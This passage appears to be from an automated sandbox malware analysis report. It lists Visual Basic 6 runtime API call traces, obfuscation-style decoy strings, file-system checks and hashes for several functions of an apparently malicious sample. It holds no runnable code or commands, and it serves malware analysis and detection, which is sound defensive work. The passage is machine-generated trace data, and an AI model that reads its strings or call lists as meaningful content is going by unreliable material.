                                                                                                    • __vbaStrCopy.MSVBVM60(?,?), ref: 0041FE6A
                                                                                                    • __vbaStrVarVal.MSVBVM60(?,?,00001F39,?,?), ref: 0041FE81
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000704), ref: 0041FEBB
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041FEE4
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 0041FEFC
                                                                                                    • #696.MSVBVM60(Plaisance), ref: 0041FF43
                                                                                                    • #616.MSVBVM60(SHERIFFESS,00000031,Plaisance), ref: 0041FF56
                                                                                                    • __vbaStrMove.MSVBVM60(SHERIFFESS,00000031,Plaisance), ref: 0041FF63
                                                                                                    • __vbaStrCopy.MSVBVM60(SHERIFFESS,00000031,Plaisance), ref: 0041FF91
                                                                                                    • __vbaStrMove.MSVBVM60(Tresaarsdags,SHERIFFESS,00000031,Plaisance), ref: 0041FFAE
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000708), ref: 0041FFF6
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0042001B
                                                                                                    • __vbaLenBstrB.MSVBVM60(Unidextrality), ref: 00420028
                                                                                                    • __vbaLenBstr.MSVBVM60(parisis,Unidextrality), ref: 00420038
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,0000070C), ref: 00420097
                                                                                                    • #648.MSVBVM60(0000000A), ref: 004200CF
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000710), ref: 0042011D
                                                                                                    • __vbaFreeVar.MSVBVM60(00000000,00401260,0040364C,00000710), ref: 00420140
                                                                                                    • #517.MSVBVM60(Nonincrimination5), ref: 0042014A
                                                                                                    • __vbaStrMove.MSVBVM60(Nonincrimination5), ref: 00420154
                                                                                                    • __vbaStrMove.MSVBVM60(Nonincrimination5), ref: 0042016F
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 004201AC
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000714), ref: 004201E4
                                                                                                    • #696.MSVBVM60(BELLBIRD), ref: 004201FD
                                                                                                    • #685.MSVBVM60(BELLBIRD), ref: 00420209
                                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,BELLBIRD), ref: 00420216
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403AE8,0000001C), ref: 0042025D
                                                                                                    • __vbaStrCopy.MSVBVM60(00000000,00000000,00403AE8,0000001C), ref: 0042028B
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000718), ref: 004202F1
                                                                                                    • __vbaStrMove.MSVBVM60(00000000,00401260,0040364C,00000718), ref: 0042031B
                                                                                                    • __vbaFreeStr.MSVBVM60(00000000,00401260,0040364C,00000718), ref: 00420323
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,00401260,0040364C,00000718), ref: 0042032E
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,0000071C), ref: 00420388
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000720), ref: 004203E8
                                                                                                    • #573.MSVBVM60(?,00000002), ref: 00420429
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000002), ref: 00420449
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000002), ref: 00420453
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000002), ref: 00420460
                                                                                                    • #648.MSVBVM60(0000000A,?,?,00000002), ref: 00420475
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 004204A7
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 004204C6
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000724), ref: 00420524
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000728), ref: 0042056F
                                                                                                    • __vbaVarDup.MSVBVM60(00000000,00401260,0040364C,00000728), ref: 004205C0
                                                                                                    • #629.MSVBVM60(?,?,00000041,00000002), ref: 004205DC
                                                                                                    • #704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?,?,00000041,00000002), ref: 00420604
                                                                                                    • __vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?,?,00000041,00000002), ref: 00420611
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,00000041,00000002), ref: 0042063A
                                                                                                    • __vbaStrMove.MSVBVM60(?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,00000041,00000002), ref: 00420644
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,00000041,00000002), ref: 00420659
                                                                                                    • __vbaStrMove.MSVBVM60 ref: 00420699
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 004206AF
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 004206D5
                                                                                                    • #696.MSVBVM60(Hyrernes), ref: 004206E2
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040361C,000002B4), ref: 0042075F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Move$Free$CheckHresult$List$Copy$#696$#648Bstr$#517#518#528#573#575#588#616#629#669#685#704#709Chkstk
                                                                                                    • String ID: AFSTNINGSMULIGHEDER$Acoemeti9$BELLBIRD$BRAINCHILD$Blrendder$Elskovsrytmes7$Enjoyable$GG$Genoplivningers5$Hyrernes$Improver$JAGER$KABINETTERNES$MOTELS$Nonincrimination5$Plaisance$SHERIFFESS$SINGALESERNES$Statesboy$Trainful$Tresaarsdags$Unidextrality$]$bindsaalers$demokratismen$muscularise$oplrende$parisis$premiere$r$spillelrernes$stipulr$tunesere
                                                                                                    • API String ID: 2320483787-729022756
                                                                                                    • Opcode ID: db3f99729cc7fafa79e59f3e3e23f35f2adaf3a365a527e358ae53d8de574015
                                                                                                    • Instruction ID: 7a12501a3a65c1a88b294c268ae30a63b0c8abbea0a2c45943cf0944c869869b
                                                                                                    • Opcode Fuzzy Hash: db3f99729cc7fafa79e59f3e3e23f35f2adaf3a365a527e358ae53d8de574015
                                                                                                    • Instruction Fuzzy Hash: E072D7B5D0022CAFDB21EF51CC45BDDBBB8AF08305F1081EAE549A62A1DB745B85CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00424074, Relevance: 110.6, APIs: 52, Strings: 11, Instructions: 303COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 00424091
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 004240A9
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 004240B4
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 004240C1
                                                                                                    • #619.MSVBVM60(?,00004008,000000FC), ref: 004240E0
                                                                                                    • __vbaVarTstNe.MSVBVM60(?,?,?,00004008,000000FC), ref: 00424101
                                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,00004008,000000FC), ref: 00424110
                                                                                                    • #698.MSVBVM60(?,00000493,?,?,?,00004008,000000FC), ref: 0042412D
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000493,?,?,?,00004008,000000FC), ref: 00424136
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000493,?,?,?,00004008,000000FC), ref: 00424140
                                                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000493,?,?,?,00004008,000000FC), ref: 00424148
                                                                                                    • __vbaVarDup.MSVBVM60(?,?,00000493,?,?,?,00004008,000000FC), ref: 00424161
                                                                                                    • #617.MSVBVM60(?,?,000000A7,?,?,00000493,?,?,?,00004008,000000FC), ref: 00424173
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?,000000A7,?,?,00000493,?,?,?,00004008,000000FC), ref: 0042417C
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,000000A7,?,?,00000493,?,?,?,00004008,000000FC), ref: 00424186
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,000000A7,?,?,00000493,?,?,?,00004008,000000FC), ref: 00424195
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 004241B1
                                                                                                    • #524.MSVBVM60(?,?), ref: 004241BE
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 004241C7
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,?), ref: 004241D1
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 004241E0
                                                                                                    • #716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,00004008,000000FC), ref: 004241F3
                                                                                                    • __vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,000000FC), ref: 004241FC
                                                                                                    • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,000000FC), ref: 00424206
                                                                                                    • __vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,000000FC), ref: 0042420E
                                                                                                    • __vbaChkstk.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,000000FC), ref: 00424235
                                                                                                    • __vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001,?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,000000FC), ref: 00424251
                                                                                                    • __vbaVarTstEq.MSVBVM60(?,00000000), ref: 00424261
                                                                                                    • __vbaFreeVar.MSVBVM60(?,00000000), ref: 00424270
                                                                                                    • #628.MSVBVM60(Resample3,0000007D,00000002), ref: 0042429D
                                                                                                    • __vbaStrMove.MSVBVM60(Resample3,0000007D,00000002), ref: 004242A7
                                                                                                    • __vbaNew2.MSVBVM60(00403C1C,00427544,Resample3,0000007D,00000002), ref: 004242BF
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00424321
                                                                                                    • __vbaStrMove.MSVBVM60(00000001), ref: 00424356
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000138), ref: 00424397
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 004243B5
                                                                                                    • __vbaFreeObj.MSVBVM60(?,?,00000000), ref: 004243C0
                                                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000000), ref: 004243C8
                                                                                                    • __vbaNew2.MSVBVM60(00403C1C,00427544,?,?,00000000), ref: 004243E0
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00424442
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000108), ref: 004244A1
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000108), ref: 004244C3
                                                                                                    • #537.MSVBVM60(000000B2), ref: 004244CD
                                                                                                    • __vbaStrMove.MSVBVM60(000000B2), ref: 004244D7
                                                                                                    • __vbaFreeStr.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424519
                                                                                                    • __vbaFreeStr.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424521
                                                                                                    • __vbaFreeStr.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424529
                                                                                                    • __vbaFreeStr.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424531
                                                                                                    • __vbaFreeStr.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424539
                                                                                                    • __vbaFreeStr.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424541
                                                                                                    • __vbaFreeStr.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424549
                                                                                                    • __vbaFreeObj.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424551
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$Move$CheckHresult$CopyList$ChkstkNew2$#524#537#617#619#628#698#716AddrefCallLate
                                                                                                    • String ID: DIARRHOEAL$DuB$DuB$FolderExists$JENBLER$Legendernes3$OSTMARKS$Resample3$Scripting.FileSystemObject$Tantalises1$_-
                                                                                                    • API String ID: 3904633160-2072296172
                                                                                                    • Opcode ID: cb0d2ec364b1ab15e90161a2f652f1e677a167cdc6de50ee6dc4c60d56429940
                                                                                                    • Instruction ID: d2bef4ca7f3f76692c2376f226961e101f0c33246fcf1b1f37e832b757c4dc27
                                                                                                    • Opcode Fuzzy Hash: cb0d2ec364b1ab15e90161a2f652f1e677a167cdc6de50ee6dc4c60d56429940
                                                                                                    • Instruction Fuzzy Hash: 5BD1EB71E00228AFDB10EFA1CD56BDDB7B8AF44304F5081AAE109BB1A1DB785B49CF55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004229C1, Relevance: 93.0, APIs: 41, Strings: 12, Instructions: 216COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 004229DF
                                                                                                    • #614.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 00422A0E
                                                                                                    • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 00422A13
                                                                                                    • __vbaLenBstrB.MSVBVM60(Museer,?,?,?,?,?,?,004015F6), ref: 00422A2C
                                                                                                    • __vbaStrI4.MSVBVM60(00000000,Museer,?,?,?,?,?,?,004015F6), ref: 00422A32
                                                                                                    • __vbaStrMove.MSVBVM60(00000000,Museer,?,?,?,?,?,?,004015F6), ref: 00422A3C
                                                                                                    • #690.MSVBVM60(subideal,Eyeliners,HARNISKKLDT,NATURLIGHEDER,00000000,Museer,?,?,?,?,?,?,004015F6), ref: 00422A55
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 00422A77
                                                                                                    • #528.MSVBVM60(?,?), ref: 00422A84
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 00422A8D
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,?), ref: 00422A97
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 00422AA6
                                                                                                    • #541.MSVBVM60(?,19:19:19,?,?,?,?,?,?,004015F6), ref: 00422AB7
                                                                                                    • #522.MSVBVM60(?,?,?,19:19:19,?,?,?,?,?,?,004015F6), ref: 00422AC4
                                                                                                    • #573.MSVBVM60(?,00000002), ref: 00422ADF
                                                                                                    • __vbaVarTstNe.MSVBVM60(?,?,?,00000002), ref: 00422AEC
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000004,?,00000002,?,?,?,?,?,00000002), ref: 00422B0A
                                                                                                    • __vbaLenBstrB.MSVBVM60(hyporhined,?,?,?,?,004015F6), ref: 00422B26
                                                                                                    • #702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00422B41
                                                                                                    • __vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00422B4B
                                                                                                    • #513.MSVBVM60(?,00000008,00000033,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00422B77
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000008,00000033,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00422B80
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000008,00000033,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00422B8A
                                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000008,00000033,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00422B92
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000003,00000003,00000008,?,?,?,00000008,00000033,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00422BA5
                                                                                                    • __vbaStrCat.MSVBVM60(SKJALDEDIGTNINGERNE,Stimulationerne5), ref: 00422BB7
                                                                                                    • #573.MSVBVM60(?,00000002), ref: 00422BDC
                                                                                                    • __vbaVarCat.MSVBVM60(?,?,00000008,?,00000002), ref: 00422BED
                                                                                                    • __vbaStrVarMove.MSVBVM60(00000000,?,?,00000008,?,00000002), ref: 00422BF3
                                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000008,?,00000002), ref: 00422BFD
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000004,00000002,00000008,?,?,00000000,?,?,00000008,?,00000002), ref: 00422C14
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 00422C39
                                                                                                    • #607.MSVBVM60(?,0000006B,00000002), ref: 00422C48
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,0000006B,00000002), ref: 00422C51
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,0000006B,00000002), ref: 00422C5B
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,0000006B,00000002), ref: 00422C6A
                                                                                                    • __vbaFreeStr.MSVBVM60(00422CCA,?,?,?,?,004015F6), ref: 00422CA4
                                                                                                    • __vbaFreeStr.MSVBVM60(00422CCA,?,?,?,?,004015F6), ref: 00422CAC
                                                                                                    • __vbaFreeStr.MSVBVM60(00422CCA,?,?,?,?,004015F6), ref: 00422CB4
                                                                                                    • __vbaFreeStr.MSVBVM60(00422CCA,?,?,?,?,004015F6), ref: 00422CBC
                                                                                                    • __vbaFreeStr.MSVBVM60(00422CCA,?,?,?,?,004015F6), ref: 00422CC4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$Move$List$#573Bstr$#513#522#528#541#607#614#690#702Chkstk
                                                                                                    • String ID: 19:19:19$9$Eyeliners$HARNISKKLDT$Museer$NATURLIGHEDER$SKJALDEDIGTNINGERNE$Skyggesider$Stimulationerne5$hyporhined$l$subideal
                                                                                                    • API String ID: 837318482-2628105584
                                                                                                    • Opcode ID: 6b102e28d147843e5c9ea20b10471dc937dd369e7515491ff91c6ec136190bcf
                                                                                                    • Instruction ID: f406cf1972886f10342f5aa8d44f40fdb93111304b1f75366644b1832903649c
                                                                                                    • Opcode Fuzzy Hash: 6b102e28d147843e5c9ea20b10471dc937dd369e7515491ff91c6ec136190bcf
                                                                                                    • Instruction Fuzzy Hash: 5B819CB2D0010CAADB01EBE1D956EDEB7BCAF04704F50817BF215B71E1EB7896098B65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00424574, Relevance: 61.5, APIs: 31, Strings: 4, Instructions: 224COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 00424592
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 004245BC
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 004245C7
                                                                                                    • #716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 004245D7
                                                                                                    • __vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 004245E0
                                                                                                    • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 004245EA
                                                                                                    • __vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 004245F2
                                                                                                    • #647.MSVBVM60(?,0000000A), ref: 0042460D
                                                                                                    • __vbaChkstk.MSVBVM60 ref: 00424626
                                                                                                    • __vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001), ref: 00424642
                                                                                                    • __vbaVarTstEq.MSVBVM60(?,00000000,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 00424652
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,00000000,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 0042466C
                                                                                                    • #574.MSVBVM60(00000003), ref: 00424695
                                                                                                    • __vbaStrMove.MSVBVM60(00000003), ref: 0042469F
                                                                                                    • __vbaNew2.MSVBVM60(00403C1C,00427544,00000003), ref: 004246B7
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00424719
                                                                                                    • __vbaStrMove.MSVBVM60(00000001), ref: 0042474E
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000138), ref: 0042478F
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 004247AD
                                                                                                    • __vbaFreeObj.MSVBVM60 ref: 004247B8
                                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004247C0
                                                                                                    • __vbaNew2.MSVBVM60(00403C1C,00427544), ref: 004247D8
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 0042483A
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000108), ref: 00424899
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000108), ref: 004248BB
                                                                                                    • #537.MSVBVM60(00000063), ref: 004248C2
                                                                                                    • __vbaStrMove.MSVBVM60(00000063), ref: 004248CC
                                                                                                    • __vbaFreeStr.MSVBVM60(0042492E,?,?,?,00000000,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 00424910
                                                                                                    • __vbaFreeObj.MSVBVM60(0042492E,?,?,?,00000000,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 00424918
                                                                                                    • __vbaFreeStr.MSVBVM60(0042492E,?,?,?,00000000,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 00424920
                                                                                                    • __vbaFreeStr.MSVBVM60(0042492E,?,?,?,00000000,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 00424928
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$CheckHresult$Move$ChkstkCopyListNew2$#537#574#647#716AddrefCallLate
                                                                                                    • String ID: DuB$DuB$FolderExists$Scripting.FileSystemObject
                                                                                                    • API String ID: 3082538248-3140286269
                                                                                                    • Opcode ID: 5f0cfd4aeec4b7d0d5934284d680ee92b9cbdfcc246ba4e58fc5b3c56085a50a
                                                                                                    • Instruction ID: f561923ec1cdbbee1fcbd4580028b808f85c02ec2c740af0362f3ab9ca451cd6
                                                                                                    • Opcode Fuzzy Hash: 5f0cfd4aeec4b7d0d5934284d680ee92b9cbdfcc246ba4e58fc5b3c56085a50a
                                                                                                    • Instruction Fuzzy Hash: D6A10671E00228AFDB20EF91CD45FDEB7B9AF04304F5041AAE109B72A1DB785A85CF55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004261E8, Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 153COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 00426203
                                                                                                    • __vbaChkstk.MSVBVM60 ref: 00426226
                                                                                                    • #689.MSVBVM60(Frugtfarvers1,Vince1,FORMALIAS), ref: 00426243
                                                                                                    • __vbaStrMove.MSVBVM60(Frugtfarvers1,Vince1,FORMALIAS), ref: 0042624D
                                                                                                    • __vbaStrCmp.MSVBVM60(Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426258
                                                                                                    • __vbaFreeStr.MSVBVM60(Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 0042626C
                                                                                                    • __vbaNew2.MSVBVM60(00403C1C,00427544,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426290
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 004262D4
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000118,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426315
                                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 0042632C
                                                                                                    • __vbaFreeObj.MSVBVM60(?,?,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426338
                                                                                                    • __vbaVarDup.MSVBVM60(?,?,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426362
                                                                                                    • #619.MSVBVM60(?,?,00000078,?,?,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426371
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?,00000078,?,?,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 0042637A
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000078,?,?,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426384
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000078,?,?,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426393
                                                                                                    • #586.MSVBVM60(?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 004263A6
                                                                                                    • __vbaFreeStr.MSVBVM60(004263E8,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 004263E2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$Move$CheckChkstkHresult$#586#619#689ListNew2
                                                                                                    • String ID: Alabastfabrikkernes3$Buzylene$DuB$FORMALIAS$Frugtfarvers1$Vince1
                                                                                                    • API String ID: 1624493403-2562244405
